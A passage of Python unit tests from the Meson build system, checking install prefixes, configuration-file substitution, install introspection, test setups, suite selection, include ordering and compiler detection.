fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
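        # Helper: write `in_data` to a temp file, run do_conf_file() on it and
        # return the resulting output as a string.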
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
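        # Helper: the same define must render identically through the meson,
        # cmake and cmake@ variable formats.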
def check_formats(confdata, result):
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
confdata = ConfigurationData()
        # KeyError since the keys do not exist
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False, 'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True, 'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value', 'description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10, 'description')}
check_formats(confdata, '#define VAR 10\n')
        # Check multiple substitutions of the same string with the cmake formats
confdata.values = {'VAR': ('value', 'description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')
        # Check that invalid input raises a MesonException
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
# Dict value in confdata
confdata.values = {'VAR': (['value'], 'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
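# Same ordering caveat as in test_install_introspection: normalize the target order before checking the install filenames.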
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
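# Each installed path (plus the install root itself) should appear in the log exactly once; the dict values count occurrences.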
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = [Path(line.strip()) for line in f.readlines() if not line.startswith('#')]
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_force_fallback_for(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run the buggy test with a setup whose env will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run the buggy test with a setup without env; it will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Running tests without --setup causes the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
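# Helper: a failing run is expected to exit with a return code equal to the number of failed tests; a successful run is only acceptable when failure_count is 0.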
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somefxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# Need to run the build so the private dir is created.
self.build()
pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
self.assertEqual(len(pdirs), 1)
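# Strip the build dir prefix (and the path separator) so the private dir matches the relative -I argument on the command line.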
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], "-I" + privdir)
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], '-I' + privdir)
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_sunos():
self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
